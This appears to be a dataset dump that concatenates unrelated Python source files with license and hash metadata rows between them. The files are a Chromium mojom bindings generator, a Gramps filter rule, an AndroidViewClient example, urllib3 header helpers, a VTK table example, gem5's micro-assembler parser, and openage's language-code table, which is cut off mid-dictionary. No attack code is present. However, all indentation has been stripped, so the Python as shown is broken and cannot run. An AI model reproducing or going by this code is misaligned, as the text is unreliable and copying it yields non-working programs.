tree = self._parsed_files[filename]
dirname, name = os.path.split(filename)
mojom = Translate(tree, name)
if args.debug_print_intermediate:
pprint.PrettyPrinter().pprint(mojom)
# Process all our imports first and collect the module object for each.
# We use these to generate proper type info.
for import_data in mojom['imports']:
import_filename = FindImportFile(dirname,
import_data['filename'],
args.import_directories)
import_data['module'] = self._GenerateModule(
args, remaining_args, generator_modules, import_filename)
module = OrderedModuleFromData(mojom)
# Set the path as relative to the source root.
module.path = os.path.relpath(os.path.abspath(filename),
os.path.abspath(args.depth))
# Normalize to unix-style path here to keep the generators simpler.
module.path = module.path.replace('\\', '/')
if self._should_generate(filename):
for generator_module in generator_modules:
generator = generator_module.Generator(module, args.output_dir)
filtered_args = []
if hasattr(generator_module, 'GENERATOR_PREFIX'):
prefix = '--' + generator_module.GENERATOR_PREFIX + '_'
filtered_args = [arg for arg in remaining_args
if arg.startswith(prefix)]
generator.GenerateFiles(filtered_args)
# Save result.
self._processed_files[filename] = module
return module
def _ParseFileAndImports(self, filename, import_directories,
imported_filename_stack):
# Ignore already-parsed files.
if filename in self._parsed_files:
return
if filename in imported_filename_stack:
print "%s: Error: Circular dependency" % filename + \
MakeImportStackMessage(imported_filename_stack + [filename])
sys.exit(1)
try:
with open(filename) as f:
source = f.read()
except IOError as e:
print "%s: Error: %s" % (e.filename, e.strerror) + \
MakeImportStackMessage(imported_filename_stack + [filename])
sys.exit(1)
try:
tree = Parse(source, filename)
except Error as e:
full_stack = imported_filename_stack + [filename]
print str(e) + MakeImportStackMessage(full_stack)
sys.exit(1)
dirname = os.path.split(filename)[0]
for imp_entry in tree.import_list:
import_filename = FindImportFile(dirname,
imp_entry.import_filename, import_directories)
self._ParseFileAndImports(import_filename, import_directories,
imported_filename_stack + [filename])
self._parsed_files[filename] = tree
def main():
parser = argparse.ArgumentParser(
description="Generate bindings from mojom files.")
parser.add_argument("filename", nargs="+",
help="mojom input file")
parser.add_argument("-d", "--depth", dest="depth", default=".",
help="depth from source root")
parser.add_argument("-o", "--output_dir", dest="output_dir", default=".",
help="output directory for generated files")
parser.add_argument("-g", "--generators", dest="generators_string",
metavar="GENERATORS",
default="c++,go,javascript,java,python",
help="comma-separated list of generators")
parser.add_argument("--debug_print_intermediate", action="store_true",
help="print the intermediate representation")
parser.add_argument("-I", dest="import_directories", action="append",
metavar="directory", default=[],
help="add a directory to be searched for import files")
parser.add_argument("--use_bundled_pylibs", action="store_true",
help="use Python modules bundled in the SDK")
(args, remaining_args) = parser.parse_known_args()
generator_modules = LoadGenerators(args.generators_string)
fileutil.EnsureDirectoryExists(args.output_dir)
processor = MojomProcessor(lambda filename: filename in args.filename)
for filename in args.filename:
processor.ProcessFile(args, remaining_args, generator_modules, filename)
return 0
if __name__ == "__main__":
sys.exit(main())
| bsd-3-clause | 2,191,873,826,871,393,300 | 37.131222 | 80 | 0.638661 | false |
sam-m888/gramps | gramps/gen/filters/rules/family/_regexpfathername.py | 5 | 1856 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# Gramps modules
#
#-------------------------------------------------------------------------
from ..person import RegExpName
from ._memberbase import father_base
#-------------------------------------------------------------------------
#
# RegExpFatherName
#
#-------------------------------------------------------------------------
class RegExpFatherName(RegExpName):
"""Rule that checks for full or partial name matches"""
name = _('Families with father matching the <regex_name>')
description = _("Matches families whose father has a name "
"matching a specified regular expression")
category = _('Father filters')
base_class = RegExpName
apply = father_base
| gpl-2.0 | 8,945,566,058,980,223,000 | 36.12 | 79 | 0.554418 | false |
Shivam-Miglani/AndroidViewClient | examples/monkeyrunner-issue-36544-workaround.py | 9 | 2846 | #! /usr/bin/env python
'''
Copyright (C) 2012 Diego Torres Milano
Created on Sep 8, 2012
@author: diego
@see: http://code.google.com/p/android/issues/detail?id=36544
'''
import re
import sys
import os
# This must be imported before MonkeyRunner and MonkeyDevice,
# otherwise the import fails.
# PyDev sets PYTHONPATH, use it
try:
for p in os.environ['PYTHONPATH'].split(':'):
if not p in sys.path:
sys.path.append(p)
except:
pass
try:
sys.path.append(os.path.join(os.environ['ANDROID_VIEW_CLIENT_HOME'], 'src'))
except:
pass
from com.dtmilano.android.viewclient import ViewClient, View
device, serialno = ViewClient.connectToDeviceOrExit()
FLAG_ACTIVITY_NEW_TASK = 0x10000000
# We are not using Settings as the bug describes because there's no WiFi dialog in emulator
#componentName = 'com.android.settings/.Settings'
componentName = 'com.dtmilano.android.sampleui/.MainActivity'
device.startActivity(component=componentName, flags=FLAG_ACTIVITY_NEW_TASK)
ViewClient.sleep(3)
# Set it to True or False to decide if AndroidViewClient or plain monkeyrunner is used
USE_AVC = True
if USE_AVC:
# AndroidViewClient
vc = ViewClient(device=device, serialno=serialno)
showDialogButton = vc.findViewById('id/show_dialog_button')
if showDialogButton:
showDialogButton.touch()
vc.dump()
vc.findViewById('id/0x123456').type('Donald')
ok = vc.findViewWithText('OK')
if ok:
# 09-08 20:17:47.860: D/MonkeyStub(2033): translateCommand: tap 265 518
ok.touch()
vc.dump()
hello = vc.findViewById('id/hello')
if hello:
if hello.getText() == "Hello Donald":
print "OK"
else:
print "FAIL"
else:
print >> sys.stderr, "'hello' not found"
else:
print >> sys.stderr, "'Show Dialog' button not found"
else:
# MonkeyRunner
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
easyDevice = EasyMonkeyDevice(device)
showDialogButton = By.id('id/show_dialog_button')
if showDialogButton:
easyDevice.touch(showDialogButton, MonkeyDevice.DOWN_AND_UP)
ViewClient.sleep(3)
editText = By.id('id/0x123456')
print editText
easyDevice.type(editText, 'Donald')
ViewClient.sleep(3)
ok = By.id('id/button1')
if ok:
# 09-08 20:16:41.119: D/MonkeyStub(1992): translateCommand: tap 348 268
easyDevice.touch(ok, MonkeyDevice.DOWN_AND_UP)
hello = By.id('id/hello')
if hello:
if easyDevice.getText(hello) == "Hello Donald":
print "OK"
else:
print "FAIL"
else:
print >> sys.stderr, "'hello' not found"
| apache-2.0 | -2,726,321,241,022,355,500 | 29.602151 | 91 | 0.643008 | false |
atramos/facebook-photo-sync | facebook/requests/packages/urllib3/util/request.py | 1008 | 2089 | from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
| gpl-3.0 | -759,284,638,286,438,100 | 28.422535 | 85 | 0.61034 | false |
sankhesh/VTK | Examples/Infovis/Python/tables1.py | 13 | 1485 | #!/usr/bin/env python
"""
This file contains Python code illustrating the creation and manipulation of
vtkTable objects.
"""
from __future__ import print_function
from vtk import *
#------------------------------------------------------------------------------
# Script Entry Point (i.e., main() )
#------------------------------------------------------------------------------
if __name__ == "__main__":
""" Main entry point of this python script """
print("vtkTable Example 1: Building a vtkTable from scratch.")
#----------------------------------------------------------
# Create an empty table
T = vtkTable()
#----------------------------------------------------------
# Create Column 1 (IDs)
col1 = vtkIntArray()
col1.SetName("ID")
for i in range(1, 8):
col1.InsertNextValue(i)
T.AddColumn(col1)
#----------------------------------------------------------
# Create Column 2 (Names)
namesList = ['Bob', 'Ann', 'Sue', 'Bill', 'Joe', 'Jill', 'Rick']
col2 = vtkStringArray()
col2.SetName("Name")
for val in namesList:
col2.InsertNextValue(val)
T.AddColumn(col2)
#----------------------------------------------------------
# Create Column 3 (Ages)
agesList = [12, 25, 72, 11, 31, 36, 32]
col3 = vtkIntArray()
col3.SetName("Age")
for val in agesList:
col3.InsertNextValue(val)
T.AddColumn(col3)
T.Dump(6)
print("vtkTable Example 1: Finished.")
| bsd-3-clause | 4,190,046,905,745,310,000 | 28.7 | 79 | 0.445118 | false |
rjschof/gem5 | src/arch/micro_asm.py | 86 | 14724 | # Copyright (c) 2003-2005 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
import os
import sys
import re
import string
import traceback
# get type names
from types import *
from ply import lex
from ply import yacc
##########################################################################
#
# Base classes for use outside of the assembler
#
##########################################################################
class Micro_Container(object):
def __init__(self, name):
self.microops = []
self.name = name
self.directives = {}
self.micro_classes = {}
self.labels = {}
def add_microop(self, mnemonic, microop):
self.microops.append(microop)
def __str__(self):
string = "%s:\n" % self.name
for microop in self.microops:
string += " %s\n" % microop
return string
class Combinational_Macroop(Micro_Container):
pass
class Rom_Macroop(object):
def __init__(self, name, target):
self.name = name
self.target = target
def __str__(self):
return "%s: %s\n" % (self.name, self.target)
class Rom(Micro_Container):
def __init__(self, name):
super(Rom, self).__init__(name)
self.externs = {}
##########################################################################
#
# Support classes
#
##########################################################################
class Label(object):
def __init__(self):
self.extern = False
self.name = ""
class Block(object):
def __init__(self):
self.statements = []
class Statement(object):
def __init__(self):
self.is_microop = False
self.is_directive = False
self.params = ""
class Microop(Statement):
def __init__(self):
super(Microop, self).__init__()
self.mnemonic = ""
self.labels = []
self.is_microop = True
class Directive(Statement):
def __init__(self):
super(Directive, self).__init__()
self.name = ""
self.is_directive = True
##########################################################################
#
# Functions that handle common tasks
#
##########################################################################
def print_error(message):
print
print "*** %s" % message
print
def handle_statement(parser, container, statement):
if statement.is_microop:
if statement.mnemonic not in parser.microops.keys():
raise Exception, "Unrecognized mnemonic: %s" % statement.mnemonic
parser.symbols["__microopClassFromInsideTheAssembler"] = \
parser.microops[statement.mnemonic]
try:
microop = eval('__microopClassFromInsideTheAssembler(%s)' %
statement.params, {}, parser.symbols)
except:
print_error("Error creating microop object with mnemonic %s." % \
statement.mnemonic)
raise
try:
for label in statement.labels:
container.labels[label.text] = microop
if label.is_extern:
container.externs[label.text] = microop
container.add_microop(statement.mnemonic, microop)
except:
print_error("Error adding microop.")
raise
elif statement.is_directive:
if statement.name not in container.directives.keys():
raise Exception, "Unrecognized directive: %s" % statement.name
parser.symbols["__directiveFunctionFromInsideTheAssembler"] = \
container.directives[statement.name]
try:
eval('__directiveFunctionFromInsideTheAssembler(%s)' %
statement.params, {}, parser.symbols)
except:
print_error("Error executing directive.")
print container.directives
raise
else:
raise Exception, "Didn't recognize the type of statement", statement
##########################################################################
#
# Lexer specification
#
##########################################################################
# Error handler. Just call exit. Output formatted to work under
# Emacs compile-mode. Optional 'print_traceback' arg, if set to True,
# prints a Python stack backtrace too (can be handy when trying to
# debug the parser itself).
def error(lineno, string, print_traceback = False):
# Print a Python stack backtrace if requested.
if (print_traceback):
traceback.print_exc()
if lineno != 0:
line_str = "%d:" % lineno
else:
line_str = ""
sys.exit("%s %s" % (line_str, string))
reserved = ('DEF', 'MACROOP', 'ROM', 'EXTERN')
tokens = reserved + (
# identifier
'ID',
# arguments for microops and directives
'PARAMS',
'LPAREN', 'RPAREN',
'LBRACE', 'RBRACE',
'COLON', 'SEMI', 'DOT',
'NEWLINE'
)
# New lines are ignored at the top level, but they end statements in the
# assembler
states = (
('asm', 'exclusive'),
('params', 'exclusive'),
)
reserved_map = { }
for r in reserved:
reserved_map[r.lower()] = r
# Ignore comments
def t_ANY_COMMENT(t):
r'\#[^\n]*(?=\n)'
def t_ANY_MULTILINECOMMENT(t):
r'/\*([^/]|((?<!\*)/))*\*/'
# A colon marks the end of a label. It should follow an ID which will
# put the lexer in the "params" state. Seeing the colon will put it back
# in the "asm" state since it knows it saw a label and not a mnemonic.
def t_params_COLON(t):
r':'
t.lexer.begin('asm')
return t
# Parameters are a string of text which don't contain an unescaped statement
# statement terminator, ie a newline or semi colon.
def t_params_PARAMS(t):
r'([^\n;\\]|(\\[\n;\\]))+'
t.lineno += t.value.count('\n')
unescapeParamsRE = re.compile(r'(\\[\n;\\])')
def unescapeParams(mo):
val = mo.group(0)
return val[1]
t.value = unescapeParamsRE.sub(unescapeParams, t.value)
t.lexer.begin('asm')
return t
# An "ID" in the micro assembler is either a label, directive, or mnemonic
# If it's either a directive or a mnemonic, it will be optionally followed by
# parameters. If it's a label, the following colon will make the lexer stop
# looking for parameters.
def t_asm_ID(t):
r'[A-Za-z_]\w*'
t.type = reserved_map.get(t.value, 'ID')
# If the ID is really "extern", we shouldn't start looking for parameters
# yet. The real ID, the label itself, is coming up.
if t.type != 'EXTERN':
t.lexer.begin('params')
return t
# If there is a label and you're -not- in the assembler (which would be caught
# above), don't start looking for parameters.
def t_ANY_ID(t):
r'[A-Za-z_]\w*'
t.type = reserved_map.get(t.value, 'ID')
return t
# Braces enter and exit micro assembly
def t_INITIAL_LBRACE(t):
r'\{'
t.lexer.begin('asm')
return t
def t_asm_RBRACE(t):
r'\}'
t.lexer.begin('INITIAL')
return t
# At the top level, keep track of newlines only for line counting.
def t_INITIAL_NEWLINE(t):
r'\n+'
t.lineno += t.value.count('\n')
# In the micro assembler, do line counting but also return a token. The
# token is needed by the parser to detect the end of a statement.
def t_asm_NEWLINE(t):
r'\n+'
t.lineno += t.value.count('\n')
return t
# A newline or semi colon when looking for params signals that the statement
# is over and the lexer should go back to looking for regular assembly.
def t_params_NEWLINE(t):
r'\n+'
t.lineno += t.value.count('\n')
t.lexer.begin('asm')
return t
def t_params_SEMI(t):
r';'
t.lexer.begin('asm')
return t
# Basic regular expressions to pick out simple tokens
t_ANY_LPAREN = r'\('
t_ANY_RPAREN = r'\)'
t_ANY_SEMI = r';'
t_ANY_DOT = r'\.'
t_ANY_ignore = ' \t\x0c'
def t_ANY_error(t):
error(t.lineno, "illegal character '%s'" % t.value[0])
t.skip(1)
##########################################################################
#
# Parser specification
#
##########################################################################
# Start symbol for a file which may have more than one macroop or rom
# specification.
def p_file(t):
'file : opt_rom_or_macros'
def p_opt_rom_or_macros_0(t):
'opt_rom_or_macros : '
def p_opt_rom_or_macros_1(t):
'opt_rom_or_macros : rom_or_macros'
def p_rom_or_macros_0(t):
'rom_or_macros : rom_or_macro'
def p_rom_or_macros_1(t):
'rom_or_macros : rom_or_macros rom_or_macro'
def p_rom_or_macro_0(t):
'''rom_or_macro : rom_block
| macroop_def'''
# Defines a section of microcode that should go in the current ROM
def p_rom_block(t):
'rom_block : DEF ROM block SEMI'
if not t.parser.rom:
print_error("Rom block found, but no Rom object specified.")
raise TypeError, "Rom block found, but no Rom object was specified."
for statement in t[3].statements:
handle_statement(t.parser, t.parser.rom, statement)
t[0] = t.parser.rom
# Defines a macroop that jumps to an external label in the ROM
def p_macroop_def_0(t):
'macroop_def : DEF MACROOP ID LPAREN ID RPAREN SEMI'
if not t.parser.rom_macroop_type:
print_error("ROM based macroop found, but no ROM macroop class was specified.")
raise TypeError, "ROM based macroop found, but no ROM macroop class was specified."
macroop = t.parser.rom_macroop_type(t[3], t[5])
t.parser.macroops[t[3]] = macroop
# Defines a macroop that is combinationally generated
def p_macroop_def_1(t):
'macroop_def : DEF MACROOP ID block SEMI'
try:
curop = t.parser.macro_type(t[3])
except TypeError:
print_error("Error creating macroop object.")
raise
for statement in t[4].statements:
handle_statement(t.parser, curop, statement)
t.parser.macroops[t[3]] = curop
# A block of statements
def p_block(t):
'block : LBRACE statements RBRACE'
block = Block()
block.statements = t[2]
t[0] = block
def p_statements_0(t):
'statements : statement'
if t[1]:
t[0] = [t[1]]
else:
t[0] = []
def p_statements_1(t):
'statements : statements statement'
if t[2]:
t[1].append(t[2])
t[0] = t[1]
def p_statement(t):
'statement : content_of_statement end_of_statement'
t[0] = t[1]
# A statement can be a microop or an assembler directive
def p_content_of_statement_0(t):
'''content_of_statement : microop
| directive'''
t[0] = t[1]
# Ignore empty statements
def p_content_of_statement_1(t):
'content_of_statement : '
pass
# Statements are ended by newlines or a semi colon
def p_end_of_statement(t):
'''end_of_statement : NEWLINE
| SEMI'''
pass
# Different flavors of microop to avoid shift/reduce errors
def p_microop_0(t):
'microop : labels ID'
microop = Microop()
microop.labels = t[1]
microop.mnemonic = t[2]
t[0] = microop
def p_microop_1(t):
'microop : ID'
microop = Microop()
microop.mnemonic = t[1]
t[0] = microop
def p_microop_2(t):
'microop : labels ID PARAMS'
microop = Microop()
microop.labels = t[1]
microop.mnemonic = t[2]
microop.params = t[3]
t[0] = microop
def p_microop_3(t):
'microop : ID PARAMS'
microop = Microop()
microop.mnemonic = t[1]
microop.params = t[2]
t[0] = microop
# Labels in the microcode
def p_labels_0(t):
'labels : label'
t[0] = [t[1]]
def p_labels_1(t):
'labels : labels label'
t[1].append(t[2])
t[0] = t[1]
# labels on lines by themselves are attached to the following instruction.
def p_labels_2(t):
'labels : labels NEWLINE'
t[0] = t[1]
def p_label_0(t):
'label : ID COLON'
label = Label()
label.is_extern = False
label.text = t[1]
t[0] = label
def p_label_1(t):
'label : EXTERN ID COLON'
label = Label()
label.is_extern = True
label.text = t[2]
t[0] = label
# Directives for the macroop
def p_directive_0(t):
'directive : DOT ID'
directive = Directive()
directive.name = t[2]
t[0] = directive
def p_directive_1(t):
'directive : DOT ID PARAMS'
directive = Directive()
directive.name = t[2]
directive.params = t[3]
t[0] = directive
# Parse error handler. Note that the argument here is the offending
# *token*, not a grammar symbol (hence the need to use t.value)
def p_error(t):
if t:
error(t.lineno, "syntax error at '%s'" % t.value)
else:
error(0, "unknown syntax error", True)
class MicroAssembler(object):
def __init__(self, macro_type, microops,
rom = None, rom_macroop_type = None):
self.lexer = lex.lex()
self.parser = yacc.yacc()
self.parser.macro_type = macro_type
self.parser.macroops = {}
self.parser.microops = microops
self.parser.rom = rom
self.parser.rom_macroop_type = rom_macroop_type
self.parser.symbols = {}
self.symbols = self.parser.symbols
def assemble(self, asm):
self.parser.parse(asm, lexer=self.lexer)
macroops = self.parser.macroops
self.parser.macroops = {}
return macroops
| bsd-3-clause | 7,010,432,845,688,307,000 | 28.448 | 91 | 0.599022 | false |
UweFleis3/Uwe | py/openage/convert/hardcoded/langcodes.py | 46 | 8618 | # language codes, as used in PE file ressources
# this file is used by pefile.py
langcodes = {
1: 'ar',
2: 'bg',
3: 'ca',
4: 'zh_Hans',
5: 'cs',
6: 'da',
7: 'de',
8: 'el',
9: 'en',
10: 'es',
11: 'fi',
12: 'fr',
13: 'he',
14: 'hu',
15: 'is',
16: 'it',
17: 'ja',
18: 'ko',
19: 'nl',
20: 'no',
21: 'pl',
22: 'pt',
23: 'rm',
24: 'ro',
25: 'ru',
26: 'bs',
27: 'sk',
28: 'sq',
29: 'sv',
30: 'th',
31: 'tr',
32: 'ur',
33: 'id',
34: 'uk',
35: 'be',
36: 'sl',
37: 'et',
38: 'lv',
39: 'lt',
40: 'tg',
41: 'fa',
42: 'vi',
43: 'hy',
44: 'az',
45: 'eu',
46: 'dsb',
47: 'mk',
48: 'st',
49: 'ts',
50: 'tn',
51: 've',
52: 'xh',
53: 'zu',
54: 'af',
55: 'ka',
56: 'fo',
57: 'hi',
58: 'mt',
59: 'se',
60: 'ga',
61: 'yi',
62: 'ms',
63: 'kk',
64: 'ky',
65: 'sw',
66: 'tk',
67: 'uz',
68: 'tt',
69: 'bn',
70: 'pa',
71: 'gu',
72: 'or',
73: 'ta',
74: 'te',
75: 'kn',
76: 'ml',
77: 'as',
78: 'mr',
79: 'sa',
80: 'mn',
81: 'bo',
82: 'cy',
83: 'km',
84: 'lo',
85: 'my',
86: 'gl',
87: 'kok',
88: 'mni',
89: 'sd',
90: 'syr',
91: 'si',
92: 'chr',
93: 'iu',
94: 'am',
95: 'tzm',
96: 'ks',
97: 'ne',
98: 'fy',
99: 'ps',
100: 'fil',
101: 'dv',
102: 'bin',
103: 'ff',
104: 'ha',
105: 'ibb',
106: 'yo',
107: 'quz',
108: 'nso',
109: 'ba',
110: 'lb',
111: 'kl',
112: 'ig',
113: 'kr',
114: 'om',
115: 'ti',
116: 'gn',
117: 'haw',
118: 'la',
119: 'so',
120: 'ii',
121: 'pap',
122: 'arn',
124: 'moh',
126: 'br',
128: 'ug',
129: 'mi',
130: 'oc',
131: 'co',
132: 'gsw',
133: 'sah',
134: 'qut',
135: 'rw',
136: 'wo',
140: 'prs',
145: 'gd',
146: 'ku',
1025: 'ar_SA',
1026: 'bg_BG',
1027: 'ca_ES',
1028: 'zh_TW',
1029: 'cs_CZ',
1030: 'da_DK',
1031: 'de_DE',
1032: 'el_GR',
1033: 'en_US',
1034: 'es_ES_tradnl',
1035: 'fi_FI',
1036: 'fr_FR',
1037: 'he_IL',
1038: 'hu_HU',
1039: 'is_IS',
1040: 'it_IT',
1041: 'ja_JP',
1042: 'ko_KR',
1043: 'nl_NL',
1044: 'nb_NO',
1045: 'pl_PL',
1046: 'pt_BR',
1047: 'rm_CH',
1048: 'ro_RO',
1049: 'ru_RU',
1050: 'hr_HR',
1051: 'sk_SK',
1052: 'sq_AL',
1053: 'sv_SE',
1054: 'th_TH',
1055: 'tr_TR',
1056: 'ur_PK',
1057: 'id_ID',
1058: 'uk_UA',
1059: 'be_BY',
1060: 'sl_SI',
1061: 'et_EE',
1062: 'lv_LV',
1063: 'lt_LT',
1064: 'tg_Cyrl_TJ',
1065: 'fa_IR',
1066: 'vi_VN',
1067: 'hy_AM',
1068: 'az_Latn_AZ',
1069: 'eu_ES',
1070: 'hsb_DE',
1071: 'mk_MK',
1072: 'st_ZA',
1073: 'ts_ZA',
1074: 'tn_ZA',
1075: 've_ZA',
1076: 'xh_ZA',
1077: 'zu_ZA',
1078: 'af_ZA',
1079: 'ka_GE',
1080: 'fo_FO',
1081: 'hi_IN',
1082: 'mt_MT',
1083: 'se_NO',
1085: 'yi_Hebr',
1086: 'ms_MY',
1087: 'kk_KZ',
1088: 'ky_KG',
1089: 'sw_KE',
1090: 'tk_TM',
1091: 'uz_Latn_UZ',
1092: 'tt_RU',
1093: 'bn_IN',
1094: 'pa_IN',
1095: 'gu_IN',
1096: 'or_IN',
1097: 'ta_IN',
1098: 'te_IN',
1099: 'kn_IN',
1100: 'ml_IN',
1101: 'as_IN',
1102: 'mr_IN',
1103: 'sa_IN',
1104: 'mn_MN',
1105: 'bo_CN',
1106: 'cy_GB',
1107: 'km_KH',
1108: 'lo_LA',
1109: 'my_MM',
1110: 'gl_ES',
1111: 'kok_IN',
1112: 'mni_IN',
1113: 'sd_Deva_IN',
1114: 'syr_SY',
1115: 'si_LK',
1116: 'chr_Cher_US',
1117: 'iu_Cans_CA',
1118: 'am_ET',
1119: 'tzm_Arab_MA',
1120: 'ks_Arab',
1121: 'ne_NP',
1122: 'fy_NL',
1123: 'ps_AF',
1124: 'fil_PH',
1125: 'dv_MV',
1126: 'bin_NG',
1127: 'fuv_NG',
1128: 'ha_Latn_NG',
1129: 'ibb_NG',
1130: 'yo_NG',
1131: 'quz_BO',
1132: 'nso_ZA',
1133: 'ba_RU',
1134: 'lb_LU',
1135: 'kl_GL',
1136: 'ig_NG',
1137: 'kr_NG',
1138: 'om_ET',
1139: 'ti_ET',
1140: 'gn_PY',
1141: 'haw_US',
1142: 'la_Latn',
1143: 'so_SO',
1144: 'ii_CN',
1145: 'pap_029',
1146: 'arn_CL',
1148: 'moh_CA',
1150: 'br_FR',
1152: 'ug_CN',
1153: 'mi_NZ',
1154: 'oc_FR',
1155: 'co_FR',
1156: 'gsw_FR',
1157: 'sah_RU',
1158: 'qut_GT',
1159: 'rw_RW',
1160: 'wo_SN',
1164: 'prs_AF',
1165: 'plt_MG',
1166: 'zh_yue_HK',
1167: 'tdd_Tale_CN',
1168: 'khb_Talu_CN',
1169: 'gd_GB',
1170: 'ku_Arab_IQ',
1171: 'quc_CO',
1281: 'qps_ploc',
1534: 'qps_ploca',
2049: 'ar_IQ',
2051: 'ca_ES_valencia',
2052: 'zh_CN',
2055: 'de_CH',
2057: 'en_GB',
2058: 'es_MX',
2060: 'fr_BE',
2064: 'it_CH',
2065: 'ja_Ploc_JP',
2067: 'nl_BE',
2068: 'nn_NO',
2070: 'pt_PT',
2072: 'ro_MD',
2073: 'ru_MD',
2074: 'sr_Latn_CS',
2077: 'sv_FI',
2080: 'ur_IN',
2092: 'az_Cyrl_AZ',
2094: 'dsb_DE',
2098: 'tn_BW',
2107: 'se_SE',
2108: 'ga_IE',
2110: 'ms_BN',
2115: 'uz_Cyrl_UZ',
2117: 'bn_BD',
2118: 'pa_Arab_PK',
2121: 'ta_LK',
2128: 'mn_Mong_CN',
2129: 'bo_BT',
2137: 'sd_Arab_PK',
2141: 'iu_Latn_CA',
2143: 'tzm_Latn_DZ',
2144: 'ks_Deva',
2145: 'ne_IN',
2151: 'ff_Latn_SN',
2155: 'quz_EC',
2163: 'ti_ER',
2559: 'qps_plocm',
3073: 'ar_EG',
3076: 'zh_HK',
3079: 'de_AT',
3081: 'en_AU',
3082: 'es_ES',
3084: 'fr_CA',
3098: 'sr_Cyrl_CS',
3131: 'se_FI',
3152: 'mn_Mong_MN',
3167: 'tmz_MA',
3179: 'quz_PE',
4097: 'ar_LY',
4100: 'zh_SG',
4103: 'de_LU',
4105: 'en_CA',
4106: 'es_GT',
4108: 'fr_CH',
4122: 'hr_BA',
4155: 'smj_NO',
4191: 'tzm_Tfng_MA',
5121: 'ar_DZ',
5124: 'zh_MO',
5127: 'de_LI',
5129: 'en_NZ',
5130: 'es_CR',
5132: 'fr_LU',
5146: 'bs_Latn_BA',
5179: 'smj_SE',
6145: 'ar_MA',
6153: 'en_IE',
6154: 'es_PA',
6156: 'fr_MC',
6170: 'sr_Latn_BA',
6203: 'sma_NO',
7169: 'ar_TN',
7177: 'en_ZA',
7178: 'es_DO',
7194: 'sr_Cyrl_BA',
7227: 'sma_SE',
8193: 'ar_OM',
8201: 'en_JM',
8202: 'es_VE',
8204: 'fr_RE',
8218: 'bs_Cyrl_BA',
8251: 'sms_FI',
9217: 'ar_YE',
9225: 'en_029',
9226: 'es_CO',
9228: 'fr_CD',
9242: 'sr_Latn_RS',
9275: 'smn_FI',
10241: 'ar_SY',
10249: 'en_BZ',
10250: 'es_PE',
10252: 'fr_SN',
10266: 'sr_Cyrl_RS',
11265: 'ar_JO',
11273: 'en_TT',
11274: 'es_AR',
11276: 'fr_CM',
11290: 'sr_Latn_ME',
12289: 'ar_LB',
12297: 'en_ZW',
12298: 'es_EC',
12300: 'fr_CI',
12314: 'sr_Cyrl_ME',
13313: 'ar_KW',
13321: 'en_PH',
13322: 'es_CL',
13324: 'fr_ML',
14337: 'ar_AE',
14345: 'en_ID',
14346: 'es_UY',
14348: 'fr_MA',
15361: 'ar_BH',
15369: 'en_HK',
15370: 'es_PY',
